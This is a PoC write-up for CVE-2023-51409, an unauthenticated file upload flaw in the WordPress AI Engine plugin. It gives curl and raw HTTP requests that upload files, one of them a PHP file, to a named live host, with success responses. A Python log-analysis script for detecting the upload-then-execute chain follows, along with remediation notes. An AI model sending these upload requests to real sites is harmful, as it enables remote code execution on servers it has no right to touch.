PoC details: 63f637536c4e926b9597edb4f1080757e1f5d550

Related vulnerability
Title: WordPress Plugin AI Engine code issue vulnerability (CVE-2023-51409)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP; it lets users host a personal blog on a server running PHP and MySQL. A WordPress plugin is an application plugin for that platform. The WordPress plugin AI Engine has a code issue vulnerability caused by unrestricted upload of files with dangerous types.
# CVE-2023-51409
AI Engine: ChatGPT Chatbot - Unauthenticated Arbitrary File Upload via rest_upload

### Description:
The AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'rest_upload' function in all versions up to, and including, 1.9.98. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

```
Severity: critical
CVE ID: CVE-2023-51409
CVSS Score: 9.8
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Plugin Slug: ai-engine
WPScan URL: https://www.wpscan.com/plugin/ai-engine
Reference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/a3fc4bac-9be0-4a1c-b4bb-4384d80e22f7?source=api-prod
```

POC
---
CURL
```
$ cat test.txt
imhunterand.txt
$ curl -X POST http://wordpress.trusona.com/wp-json/mwai-ui/v1/files/upload -H "Content-Disposition: form-data; filename=\"test.txt\"" -F "file=@test.txt" | jq -r
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   336  100   139  100   197   1738   2463 --:--:-- --:--:-- --:--:--  4602
{
  "success": true,
  "data": {
    "id": "dc05affbc88c6d731a8fc6d122cd3839",
    "url": "http://wordpress.trusona.com/wp-content/uploads/2024/02/test-1.txt"
  }
}

$ curl http://wordpress.trusona.com/wp-content/uploads/2024/02/test-1.txt
robbie.txt
```

RAW HTTP
---
Request

```
POST /wp-json/mwai-ui/v1/files/upload HTTP/1.1
Host: wordpress.trusona.com
User-Agent: curl/8.1.2
Accept: */*
Content-Disposition: form-data; filename="test.txt"
Content-Length: 206
Content-Type: multipart/form-data; boundary=------------------------8ecd2b831e8d20f4
Connection: close

--------------------------8ecd2b831e8d20f4
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: text/plain

<?php phpinfo(); ?>

--------------------------8ecd2b831e8d20f4--
```

Response
```
{
  "data": {
    "id": "1044f1ab4f6340fea9abecb331fe981c",
    "url": "http://wordpress.trusona.com/wp-content/uploads/2024/02/test.php"
  },
  "success": true
}
```
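The request/response pair above is the whole chain a defender needs to spot in web server logs: a POST to the unauthenticated `mwai-ui/v1/files/upload` route, then a fetch of a PHP file from `wp-content/uploads/`. The following detection script is an added example and not part of the original PoC; the access log lines are constructed samples in combined log format, and the client IPs are documentation addresses.

```python
import re

# Constructed sample access log (combined format); not taken from the PoC or any real site.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Feb/2024:10:01:02 +0000] "POST /wp-json/mwai-ui/v1/files/upload HTTP/1.1" 200 139 "-" "curl/8.1.2"
203.0.113.7 - - [12/Feb/2024:10:01:05 +0000] "GET /wp-content/uploads/2024/02/test.php HTTP/1.1" 200 512 "-" "curl/8.1.2"
198.51.100.4 - - [12/Feb/2024:10:02:00 +0000] "POST /wp-json/mwai-ui/v1/files/upload HTTP/1.1" 200 139 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Feb/2024:10:02:03 +0000] "GET /wp-content/uploads/2024/02/photo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.9 - - [12/Feb/2024:10:03:00 +0000] "GET /wp-content/uploads/2024/02/shell.php HTTP/1.1" 200 512 "-" "curl/8.1.2"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_ENDPOINT = "/wp-json/mwai-ui/v1/files/upload"   # vulnerable REST route from the PoC
UPLOADS_PREFIX = "/wp-content/uploads/"
# Server-side executable extensions that should never be served from the uploads tree.
EXEC_EXT = (".php", ".phtml", ".php5", ".php7", ".phar", ".inc")


def parse_line(line):
    """Parse one combined-format access log line; return a dict or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_suspicious(log_text):
    """Return (severity, ip, path) for executable files fetched from uploads.

    "high": the same client earlier got a 200 from the upload route, i.e. the
    exact upload-then-execute chain shown in the PoC. "medium": an executable
    is served from uploads with no matching upload in this log window (the
    upload may predate the window, or the file is a pre-existing webshell).
    """
    uploaders = set()
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"] == UPLOAD_ENDPOINT and rec["status"] == "200":
            uploaders.add(rec["ip"])
        elif rec["method"] == "GET" and rec["path"].startswith(UPLOADS_PREFIX):
            clean = rec["path"].split("?", 1)[0].lower()   # strip query string before checking
            if clean.endswith(EXEC_EXT):
                severity = "high" if rec["ip"] in uploaders else "medium"
                findings.append((severity, rec["ip"], rec["path"]))
    return findings


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(*finding)
```

Serving the uploads directory with PHP execution disabled (and updating the plugin past 1.9.98) removes the impact; this script only tells you whether the chain already happened.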